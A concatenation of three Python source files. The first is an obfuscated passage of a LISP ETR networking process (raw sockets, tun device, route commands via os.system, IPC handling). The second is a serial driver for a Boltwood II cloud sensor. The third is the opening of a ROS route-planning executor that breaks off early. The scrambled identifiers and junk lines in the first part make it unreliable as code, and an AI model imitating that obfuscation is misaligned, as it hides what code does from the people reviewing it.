if 34 - 34: I11i / I11i % IiII . OoOoOO00 / Oo0Ooo
if 99 - 99: ooOoO0o * I1IiiI - ooOoO0o % Ii1I
if 40 - 40: OOooOOo / IiII / iIii1I11I1II1 + Ii1I
if 59 - 59: I11i * OoooooooOO + OOooOOo . iIii1I11I1II1 / i1IIi
if 75 - 75: I11i . OOooOOo - iIii1I11I1II1 * OoO0O00 * iII111i
i1 = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
i1 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
o0oOoO00o . append ( i1 )
if 93 - 93: ooOoO0o
if 18 - 18: ooOoO0o
if 66 - 66: oO0o * i11iIiiIii + OoOoOO00 / OOooOOo
if 96 - 96: OOooOOo + OOooOOo % IiII % OOooOOo
if 28 - 28: iIii1I11I1II1 + OoOoOO00 . o0oOOo0O0Ooo % i11iIiiIii
if 58 - 58: I11i / OoooooooOO % oO0o + OoO0O00
if 58 - 58: O0
if 91 - 91: iII111i / I1ii11iIi11i . iII111i - o0oOOo0O0Ooo + I1ii11iIi11i
if 72 - 72: Ii1I . IiII * I1ii11iIi11i / I1ii11iIi11i / iII111i
if 13 - 13: i1IIi
if 17 - 17: i11iIiiIii * o0oOOo0O0Ooo * o0oOOo0O0Ooo + OoO0O00
if 95 - 95: I1IiiI
if 95 - 95: OOooOOo % I1ii11iIi11i + o0oOOo0O0Ooo % ooOoO0o
if 36 - 36: O0 / i1IIi % II111iiii / iII111i
if 96 - 96: Oo0Ooo / oO0o . II111iiii . Oo0Ooo
if 91 - 91: II111iiii . OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: oO0o
if 37 - 37: IiII / i11iIiiIii / Oo0Ooo
if 97 - 97: I1Ii111 . I11i / I1IiiI
if 83 - 83: I11i - I1ii11iIi11i * oO0o
if ( pytun != None ) :
i1111 = b'\x00\x00\x86\xdd'
iIi1Ii = "lispers.net"
try :
oOOoo00O0O = pytun . TunTapDevice ( flags = pytun . IFF_TUN ,
name = iIi1Ii )
os . system ( "ip link set dev {} up" . format ( iIi1Ii ) )
except :
lisp . lprint ( "Cannot create tuntap interface" )
if 90 - 90: Oo0Ooo * I1IiiI
if 75 - 75: I1ii11iIi11i - OoOoOO00 * i11iIiiIii . OoooooooOO - Oo0Ooo . I11i
if 6 - 6: I11i * oO0o / OoooooooOO % Ii1I * o0oOOo0O0Ooo
if 28 - 28: IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
threading . Thread ( target = o0OO0oooo , args = [ ] ) . start ( )
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
threading . Thread ( target = i11ii , args = [ ] ) . start ( )
return ( True )
if 38 - 38: I1Ii111
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
if 22 - 22: oO0o * iII111i
if 4 - 4: OoOoOO00 - oO0o + I1IiiI
if 36 - 36: IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
def iiI1iIII1ii ( ) :
global Oo0o
global Ii1iI
if 5 - 5: I1Ii111 % OoooooooOO . OoOoOO00
if 67 - 67: I1ii11iIi11i + Ii1I
if 72 - 72: IiII % o0oOOo0O0Ooo
if 93 - 93: iIii1I11I1II1 + i11iIiiIii . o0oOOo0O0Ooo . i1IIi % I1IiiI % ooOoO0o
if ( Oo0o ) : Oo0o . cancel ( )
if ( Ii1iI ) : Ii1iI . cancel ( )
if 74 - 74: OoOoOO00 / i1IIi % OoooooooOO
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
lisp . lisp_close_socket ( o0oOoO00o [ 0 ] , "" )
lisp . lisp_close_socket ( o0oOoO00o [ 1 ] , "" )
lisp . lisp_close_socket ( Ooo , "lisp-etr" )
return
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 65 - 65: II111iiii / Oo0Ooo
if 42 - 42: i11iIiiIii . O0
if 75 - 75: I1Ii111 + iIii1I11I1II1
if 19 - 19: I1IiiI + i11iIiiIii . IiII - I11i / Ii1I + o0oOOo0O0Ooo
if 38 - 38: Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1 % I1ii11iIi11i
if 92 - 92: I11i / O0 * I1IiiI - I11i
if 99 - 99: i11iIiiIii % OoooooooOO
if 56 - 56: IiII * I1Ii111
if 98 - 98: I11i + O0 * I1Ii111 + i11iIiiIii - OOooOOo - iIii1I11I1II1
if 5 - 5: OOooOOo % Oo0Ooo % IiII % ooOoO0o
def I1Iiii ( ipc ) :
ipc = ipc . split ( "%" )
iIIIIiiIii = ipc [ 1 ]
I1I1Iii1Iiii = ipc [ 2 ]
if ( I1I1Iii1Iiii == "None" ) : I1I1Iii1Iiii = None
if 4 - 4: IiII
i1OO0oOOoo = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1OO0oOOoo . store_address ( iIIIIiiIii )
if 93 - 93: oO0o % i1IIi
if 83 - 83: I1IiiI . Oo0Ooo - I11i . o0oOOo0O0Ooo
if 73 - 73: I1IiiI - iII111i . iII111i
if 22 - 22: ooOoO0o / ooOoO0o - Ii1I % I11i . OOooOOo + IiII
O0oOoOO = lisp . lisp_db_for_lookups . lookup_cache ( i1OO0oOOoo , False )
if ( O0oOoOO == None or O0oOoOO . dynamic_eid_configured ( ) == False ) :
lisp . lprint ( "ITR/ETR dynamic-EID configuration out of sync for {}" . format ( lisp . green ( iIIIIiiIii , False ) ) )
if 64 - 64: i1IIi % I1ii11iIi11i / Ii1I % OoooooooOO
return
if 24 - 24: I1Ii111 + OoooooooOO . IiII / OoOoOO00 / I11i
if 65 - 65: OoooooooOO
if 18 - 18: O0 - i1IIi . I1Ii111
if 98 - 98: o0oOOo0O0Ooo
if 73 - 73: Oo0Ooo - iII111i . oO0o % i1IIi . O0
if 15 - 15: ooOoO0o . iIii1I11I1II1 * I1IiiI % I11i
I1IIIiI1I1ii1 = None
if ( iIIIIiiIii in O0oOoOO . dynamic_eids ) : I1IIIiI1I1ii1 = O0oOoOO . dynamic_eids [ iIIIIiiIii ]
if 21 - 21: OoO0O00 - I1IiiI . OoooooooOO
if ( I1IIIiI1I1ii1 == None and I1I1Iii1Iiii == None ) :
lisp . lprint ( "ITR/ETR state mismatch for {}" . format ( lisp . green ( iIIIIiiIii , False ) ) )
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo / iIii1I11I1II1 * I1Ii111
return
if 3 - 3: OOooOOo . IiII / Oo0Ooo
if 89 - 89: OoooooooOO . iIii1I11I1II1 . Oo0Ooo * iIii1I11I1II1 - I1Ii111
if 92 - 92: OoooooooOO - I1ii11iIi11i - OoooooooOO % I1IiiI % I1IiiI % iIii1I11I1II1
if 92 - 92: iII111i * O0 % I1Ii111 . iIii1I11I1II1
if 66 - 66: I11i + Ii1I
if 48 - 48: I1ii11iIi11i
if 96 - 96: ooOoO0o . OoooooooOO
if ( I1IIIiI1I1ii1 and I1I1Iii1Iiii ) :
if ( I1IIIiI1I1ii1 . interface == I1I1Iii1Iiii ) :
lisp . lprint ( "ITR sent redundant IPC for {}" . format ( lisp . green ( iIIIIiiIii , False ) ) )
if 39 - 39: OOooOOo + OoO0O00
else :
lisp . lprint ( "Dynamic-EID {} interface change, {} -> {}" . format ( lisp . green ( iIIIIiiIii , False ) , I1IIIiI1I1ii1 . interface , I1I1Iii1Iiii ) )
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
I1IIIiI1I1ii1 . interface = I1I1Iii1Iiii
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
return
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
if 88 - 88: Oo0Ooo
if ( I1I1Iii1Iiii ) :
I1IIIiI1I1ii1 = lisp . lisp_dynamic_eid ( )
I1IIIiI1I1ii1 . dynamic_eid . copy_address ( i1OO0oOOoo )
I1IIIiI1I1ii1 . interface = I1I1Iii1Iiii
I1IIIiI1I1ii1 . get_timeout ( I1I1Iii1Iiii )
O0oOoOO . dynamic_eids [ iIIIIiiIii ] = I1IIIiI1I1ii1
if 8 - 8: I1ii11iIi11i
o000 = lisp . bold ( "Registering" , False )
iIIIIiiIii = lisp . bold ( iIIIIiiIii , False )
lisp . lprint ( "{} dynamic-EID {} on interface {}, timeout {}" . format ( o000 ,
lisp . green ( iIIIIiiIii , False ) , I1I1Iii1Iiii , I1IIIiI1I1ii1 . timeout ) )
if 30 - 30: Ii1I + II111iiii % OoooooooOO
i1iiI11I ( o0oOoO00o , None , i1OO0oOOoo , None , False )
if 89 - 89: Ii1I
if 51 - 51: iII111i
if 68 - 68: iII111i - o0oOOo0O0Ooo * OoO0O00 % ooOoO0o . ooOoO0o - iIii1I11I1II1
if 22 - 22: OoooooooOO / I1ii11iIi11i % iII111i * OoOoOO00
if ( lisp . lisp_is_macos ( ) == False ) :
iIIIIiiIii = i1OO0oOOoo . print_prefix_no_iid ( )
Ii1IiiiI1ii = "ip route add {} dev {}" . format ( iIIIIiiIii , I1I1Iii1Iiii )
os . system ( Ii1IiiiI1ii )
if 55 - 55: I1ii11iIi11i
return
if 76 - 76: oO0o - i11iIiiIii
if 27 - 27: I1ii11iIi11i - i11iIiiIii % I1Ii111 / Oo0Ooo . Oo0Ooo / OoooooooOO
if 76 - 76: I11i * OoO0O00 . iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
if ( iIIIIiiIii in O0oOoOO . dynamic_eids ) :
I1I1Iii1Iiii = O0oOoOO . dynamic_eids [ iIIIIiiIii ] . interface
o0O00O = lisp . bold ( "Deregistering" , False )
lisp . lprint ( "{} dynamic-EID {}" . format ( o0O00O ,
lisp . green ( iIIIIiiIii , False ) ) )
if 21 - 21: OoooooooOO . OoOoOO00 - iIii1I11I1II1 % IiII
i1iiI11I ( o0oOoO00o , 0 , i1OO0oOOoo , None , False )
if 55 - 55: O0 % I1IiiI . OoooooooOO * Oo0Ooo / OoooooooOO . Ii1I
O0oOoOO . dynamic_eids . pop ( iIIIIiiIii )
if 26 - 26: IiII / iIii1I11I1II1 - iIii1I11I1II1
if 57 - 57: IiII
if 41 - 41: iIii1I11I1II1 * iII111i + Oo0Ooo * o0oOOo0O0Ooo % IiII / OOooOOo
if 63 - 63: i1IIi % i11iIiiIii % II111iiii * OoooooooOO
if ( lisp . lisp_is_macos ( ) == False ) :
iIIIIiiIii = i1OO0oOOoo . print_prefix_no_iid ( )
Ii1IiiiI1ii = "ip route delete {} dev {}" . format ( iIIIIiiIii , I1I1Iii1Iiii )
os . system ( Ii1IiiiI1ii )
if 40 - 40: Oo0Ooo
if 47 - 47: OoOoOO00
return
if 65 - 65: O0 + I1Ii111 % Ii1I * I1IiiI / ooOoO0o / OoOoOO00
if 71 - 71: i11iIiiIii / OoOoOO00 . oO0o
if 33 - 33: oO0o
if 39 - 39: OoO0O00 + O0 + ooOoO0o * II111iiii % O0 - O0
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
if 39 - 39: Ii1I
if 60 - 60: OOooOOo
if 62 - 62: I1Ii111 * I11i
if 74 - 74: OoOoOO00 . iIii1I11I1II1
def oOOoO0oO0oo0O ( ipc ) :
if ( lisp . lisp_register_all_rtrs ) : return
if 55 - 55: Oo0Ooo
IIi1i1I11IIII , o0OOOooo0OOo , i1i1 = ipc . split ( "%" )
if ( o0OOOooo0OOo not in lisp . lisp_rtr_list ) : return
if 55 - 55: iIii1I11I1II1 % OoO0O00 / I1ii11iIi11i / o0oOOo0O0Ooo
lisp . lprint ( "Process ITR IPC message, RTR {} has gone {}" . format (
lisp . red ( o0OOOooo0OOo , False ) , lisp . bold ( i1i1 , False ) ) )
if 39 - 39: OoO0O00 % oO0o / IiII * iII111i * oO0o . oO0o
iII1i11IIi1i = lisp . lisp_rtr_list [ o0OOOooo0OOo ]
if ( i1i1 == "down" ) :
lisp . lisp_rtr_list [ o0OOOooo0OOo ] = None
return
if 42 - 42: I1Ii111 % OoO0O00 . I1ii11iIi11i
if 4 - 4: i1IIi + OoOoOO00
iII1i11IIi1i = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , o0OOOooo0OOo , 32 , 0 )
lisp . lisp_rtr_list [ o0OOOooo0OOo ] = iII1i11IIi1i
return
if 39 - 39: iIii1I11I1II1 + ooOoO0o
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
def Oo0OOOoOO ( ipc ) :
iiII1IIii1i1 , IIi1i1I11IIII , i1iiiIIi11II , o0oooOo0oo = ipc . split ( "%" )
o0oooOo0oo = int ( o0oooOo0oo , 16 )
if 33 - 33: I1Ii111 % II111iiii
IIi1II = lisp . lisp_get_echo_nonce ( None , i1iiiIIi11II )
if ( IIi1II == None ) : IIi1II = lisp . lisp_echo_nonce ( i1iiiIIi11II )
if 40 - 40: OOooOOo / IiII
if ( IIi1i1I11IIII == "R" ) :
IIi1II . request_nonce_sent = o0oooOo0oo
lisp . lprint ( "Waiting for echo-nonce 0x{} from {}" . format ( lisp . lisp_hex_string ( o0oooOo0oo ) , lisp . red ( IIi1II . rloc_str , False ) ) )
if 29 - 29: Ii1I - Ii1I / ooOoO0o
elif ( IIi1i1I11IIII == "E" ) :
IIi1II . echo_nonce_sent = o0oooOo0oo
lisp . lprint ( "Sent echo-nonce 0x{} to {}" . format ( lisp . lisp_hex_string ( o0oooOo0oo ) , lisp . red ( IIi1II . rloc_str , False ) ) )
if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
return
if 18 - 18: Oo0Ooo % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
if 86 - 86: IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
iiI111i1 = {
"lisp xtr-parameters" : [ lispconfig . lisp_xtr_command , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-server" : [ OoooooOoo , {
"ms-name" : [ True ] ,
"address" : [ True ] ,
"dns-name" : [ True ] ,
"authentication-type" : [ False , "sha1" , "sha2" ] ,
"authentication-key" : [ False ] ,
"encryption-key" : [ False ] ,
"proxy-reply" : [ False , "yes" , "no" ] ,
"want-map-notify" : [ False , "yes" , "no" ] ,
"merge-registrations" : [ False , "yes" , "no" ] ,
"refresh-registrations" : [ False , "yes" , "no" ] ,
"site-id" : [ False , 1 , 0xffffffffffffffff ] } ] ,
"lisp database-mapping" : [ oo000OO00Oo , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"register-ttl" : [ True , 1 , 0xffffffff ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp group-mapping" : [ oO0o0o0oo , {
"group-name" : [ False ] ,
"ms-name" : [ True ] ,
"group-prefix" : [ False ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"rle-address" : [ False ] ,
"sources" : [ ] ,
"address" : [ True ] } ] ,
"show database-mapping" : [ o0o , { } ] ,
"show etr-keys" : [ oooOo0OOOoo0 , { } ] ,
"show etr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 41 - 41: i11iIiiIii * O0 - iII111i . II111iiii % OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
if ( I1II1IiI1 ( ) == False ) :
lisp . lprint ( "lisp_etr_startup() failed" )
lisp . lisp_print_banner ( "ETR abnormal exit" )
exit ( 1 )
if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
Iiii = [ Oo , Ooo ]
if 56 - 56: I11i - O0 / O0 * i1IIi . OoooooooOO % iIii1I11I1II1
while ( True ) :
try : I11iIiI1 , i1I1iiii1Ii11 , iiII1IIii1i1 = select . select ( Iiii , [ ] , [ ] )
except : break
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 6 - 6: oO0o . I11i
if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
if 50 - 50: oO0o % i1IIi * O0
if ( Oo in I11iIiI1 ) :
IIi1i1I11IIII , ooooooo00o , Iiii1iiiIiI1 , OooOOOOoO00OoOO = lisp . lisp_receive ( Oo , False )
if 4 - 4: iIii1I11I1II1 . i1IIi
if ( ooooooo00o == "" ) : break
if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
if ( Iiii1iiiIiI1 == lisp . LISP_DATA_PORT ) :
Ooo0oO ( i1 , OooOOOOoO00OoOO , ooooooo00o )
else :
if ( lisp . lisp_is_rloc_probe_request ( OooOOOOoO00OoOO [ 0 : 1 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
IiI = lisp . lisp_parse_packet ( o0oOoO00o , OooOOOOoO00OoOO ,
ooooooo00o , Iiii1iiiIiI1 )
if 34 - 34: O0 / OOooOOo
if 86 - 86: I1ii11iIi11i * i1IIi + iII111i . I1ii11iIi11i
if 100 - 100: OoooooooOO - O0 . I11i / I11i + II111iiii * OoOoOO00
if 37 - 37: Oo0Ooo
if 72 - 72: IiII % I1ii11iIi11i * OOooOOo . i11iIiiIii % IiII * OOooOOo
if ( IiI ) :
Ii1iI = threading . Timer ( 0 ,
oo0Oo00Oo0 , [ None ] )
Ii1iI . start ( )
Oo0o = threading . Timer ( 0 ,
iii11 , [ o0oOoO00o ] )
Oo0o . start ( )
if 15 - 15: I11i / Oo0Ooo * I11i
if 20 - 20: ooOoO0o - OOooOOo * OoO0O00 * o0oOOo0O0Ooo * OOooOOo / IiII
if 40 - 40: I1IiiI * o0oOOo0O0Ooo . I1IiiI
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
if 5 - 5: O0 - I1IiiI
if 44 - 44: II111iiii . II111iiii + OOooOOo * Ii1I
if 16 - 16: II111iiii
if ( Ooo in I11iIiI1 ) :
IIi1i1I11IIII , ooooooo00o , Iiii1iiiIiI1 , OooOOOOoO00OoOO = lisp . lisp_receive ( Ooo , True )
if 100 - 100: O0 - i1IIi
if ( ooooooo00o == "" ) : break
if 48 - 48: oO0o % ooOoO0o + O0
if ( IIi1i1I11IIII == "command" ) :
OooOOOOoO00OoOO = OooOOOOoO00OoOO . decode ( )
if ( OooOOOOoO00OoOO . find ( "learn%" ) != - 1 ) :
I1Iiii ( OooOOOOoO00OoOO )
elif ( OooOOOOoO00OoOO . find ( "nonce%" ) != - 1 ) :
Oo0OOOoOO ( OooOOOOoO00OoOO )
elif ( OooOOOOoO00OoOO . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( OooOOOOoO00OoOO )
elif ( OooOOOOoO00OoOO . find ( "rtr%" ) != - 1 ) :
oOOoO0oO0oo0O ( OooOOOOoO00OoOO )
elif ( OooOOOOoO00OoOO . find ( "stats%" ) != - 1 ) :
OooOOOOoO00OoOO = OooOOOOoO00OoOO . split ( "%" ) [ - 1 ]
lisp . lisp_process_data_plane_decap_stats ( OooOOOOoO00OoOO , None )
else :
lispconfig . lisp_process_command ( Ooo ,
IIi1i1I11IIII , OooOOOOoO00OoOO , "lisp-etr" , [ iiI111i1 ] )
if 27 - 27: I1ii11iIi11i / OOooOOo
elif ( IIi1i1I11IIII == "api" ) :
OooOOOOoO00OoOO = OooOOOOoO00OoOO . decode ( )
lisp . lisp_process_api ( "lisp-etr" , Ooo , OooOOOOoO00OoOO )
else :
if ( lisp . lisp_is_rloc_probe_request ( OooOOOOoO00OoOO [ 0 : 1 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
if 33 - 33: OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
lisp . lisp_parse_packet ( o0oOoO00o , OooOOOOoO00OoOO , ooooooo00o , Iiii1iiiIiI1 )
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
if 96 - 96: oO0o % i1IIi / o0oOOo0O0Ooo
if 13 - 13: II111iiii - Oo0Ooo % i11iIiiIii + iII111i
iiI1iIII1ii ( )
lisp . lisp_print_banner ( "ETR normal exit" )
exit ( 0 )
if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
boltwood.py
|
import logging
import time
import serial
import threading
from . import api
from .report import Report, SensorsReport
class BoltwoodII:
"""Class that operates a Boltwood II cloud sensor weather station."""
def __init__(self, port: str = '/dev/ttyUSB0', baudrate: int = 4800, bytesize: int = 8, parity: str = 'N',
stopbits: int = 1, rtscts: bool = False, timeout: int = 10, *args, **kwargs):
"""
Args:
port: Serial port to use.
baudrate: Baud rate.
bytesize: Size of bytes.
parity: Parity.
stopbits: Stop bits.
rtscts: RTSCTS.
timeout: Timeout for reading [s].
*args:
**kwargs:
"""
# serial connection
self._conn = None
self._port = port
self._baudrate = baudrate
self._bytesize = bytesize
self._parity = parity
self._stopbits = stopbits
self._rtscts = rtscts
self._serial_timeout = timeout
# poll thread
self._closing = None
self._thread = None
self._thread_sleep = 1
self._max_thread_sleep = 900
# callback function
self._callback = None
def start_polling(self, callback):
"""Start polling the Boltwood II sensor.
Args:
callback: Callback function to be called with new data.
"""
# set callback
self._callback = callback
# start thread
self._closing = threading.Event()
self._thread = threading.Thread(target=self._poll_thread)
self._thread.start()
def stop_polling(self):
"""Stop polling of Boltwood II sensor."""
# close and wait for thread
self._closing.set()
self._thread.join()
def _poll_thread(self):
"""Thread to poll and respond to the serial output of the Boltwood II sensor head.
The operation of the Boltwood is somewhat strange, in that the sensor sometimes reports when
it is ready to be polled rather than simply waiting for a poll-request.
The thread places output into a circular list of parsed messages stored as
dictionaries containing the response itself, the datetime of the response
and the type of response. The other methods normally only access the most current report.
"""
# init
serial_errors = 0
sleep_time = self._thread_sleep
last_report = None
raw_data = b''
# loop until closing
while not self._closing.is_set():
# get serial connection
if self._conn is None:
logging.info('connecting to Boltwood II sensor')
try:
# connect
self._connect_serial()
# reset sleep time
serial_errors = 0
sleep_time = self._thread_sleep
except serial.SerialException as e:
# if no connection, log less often
serial_errors += 1
if serial_errors % 10 == 0:
if sleep_time < self._max_thread_sleep:
sleep_time *= 2
else:
sleep_time = self._thread_sleep
# do logging
logging.critical('%d failed connections to Boltwood II: %s, sleep %d',
serial_errors, str(e), sleep_time)
self._closing.wait(sleep_time)
# actually read next line and process it
if self._conn is not None:
# read data
raw_data += self._conn.read()
# extract messages
msgs, raw_data = self._extract_messages(raw_data)
# analyse it
for msg in msgs:
self._analyse_message(msg)
last_report = time.time()
# no report in a long time?
if last_report is not None:
# TODO: This doesn't seem to be a perfect solution, since we now always get a wait time
# after MT/MK/MW/MC packages
if time.time() - last_report > 10:
self._send_poll_request()
# close connection
self._conn.close()
def _extract_messages(self, raw_data) -> (list, bytearray):
""" Extract all complete messages from the raw data from the Boltwood.
Args:
raw_data: bytearray from Boltwood (via serial.readline())
Returns:
List of messages and remaining raw data.
Normally, there should just be a single message per readline, but....
"""
# nothing?
if not raw_data:
return [], b''
# find complete messages
msgs = []
while api.FRAME_END in raw_data:
# get message
pos = raw_data.index(b'\n')
msg = raw_data[:pos + 1]
# sometimes the response starts with '/x00', cut that away
if msg.startswith(b'\x00'):
msg = msg[1:]
# store it
msgs.append(msg)
# remove from raw_data
raw_data = raw_data[pos + 1:]
# return new raw_data and messages
return msgs, raw_data
def _connect_serial(self):
"""Open/reset serial connection to sensor."""
# close first?
if self._conn is not None and self._conn.is_open:
self._conn.close()
# create serial object
self._conn = serial.Serial(self._port, self._baudrate,
bytesize=self._bytesize, parity=self._parity,
stopbits=self._stopbits, timeout=self._serial_timeout,
rtscts=self._rtscts)
# open it
if not self._conn.is_open:
self._conn.open()
# ask for data
self._send_poll_request()
def _analyse_message(self, raw_data):
"""Analyse raw message.
Args:
raw_data: Raw data.
Returns:
"""
# no data?
if len(raw_data) == 0 or raw_data == b'\n':
# resend poll request
self._send_poll_request()
return
# get frame
# need to compare ranges, because an index into a bytesarray gives an integer, not a byte!
if raw_data[:1] != api.FRAME_START or raw_data[-1:] != api.FRAME_END:
logging.warning('Invalid frame found.')
return
frame = raw_data[1:-1]
# get command
try:
command = api.CommandChar(frame[:1])
except ValueError:
logging.error('Invalid command character found: %s', frame[:1])
return
# what do we do with this?
if command == api.CommandChar.POLL:
# acknowledge it
self._send_ack()
elif command == api.CommandChar.ACK:
# do nothing
pass
elif command == api.CommandChar.NACK:
# do nothing
pass
elif command == api.CommandChar.MSG:
# parse report
try:
report = Report.parse_report(raw_data)
except ValueError as e:
logging.error(str(e))
return
# send it?
if self._callback is not None:
self._callback(report)
def _send_ack(self):
"""Send ACK."""
# send ACK + new poll request
self._conn.write(api.FRAME_START + api.CommandChar.ACK.value + api.FRAME_END + api.REQUEST_POLL)
def _send_poll_request(self):
"""Ask sensor for data."""
self._conn.write(api.REQUEST_POLL)
__all__ = ['BoltwoodII', 'Report']
|
route_planning_program_executor.py
|
#! /usr/bin/env python
from threading import Thread
from time import time
import subprocess
import rospy
import actionlib
import offload.msg
import socket
class RoutePlanningProgramExecutor(object):
